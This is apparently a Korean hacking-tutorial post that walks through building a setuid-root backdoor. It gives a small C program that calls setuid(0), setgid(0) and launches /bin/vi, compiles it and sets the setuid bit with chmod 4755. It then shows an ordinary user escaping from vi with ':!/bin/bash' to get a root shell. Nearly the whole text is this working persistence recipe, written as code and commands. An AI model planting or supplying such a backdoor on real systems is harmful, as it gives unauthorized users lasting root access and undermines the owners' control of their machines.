[System Hacking] Setuid를 이용한 백도어 만들기 - vi편집기 이용

이번에는 백도어를 만드는 두번째 방법입니다. 

먼저 backvi.c라는 파일을 vi로 만들어줍니다.

#vi backvi.c

그리고 내부에 다음 코드를 입력합니다.

#include <stdio.h>

int main(){

   setuid(0);

   setgid(0);

   system("/bin/vi");

#gcc -o backvi backvi.c 명령어로 코딩한 것을 컴파일 합니다.

#chmod 4755 backvi 로 백도어의 접근권한을 바꿔주고 setuid설정을 해줍니다.

이제 백도어가 만들어졌습니다. 일반 사용자 모드로 접속하여 백도어를 실행시켜봅니다. 

$./backvi

vi 창이 뜨면 :!/bin/bash를 입력하고 enter를 눌러봅니다.

그러면 루트 권한으로 넘어갑니다.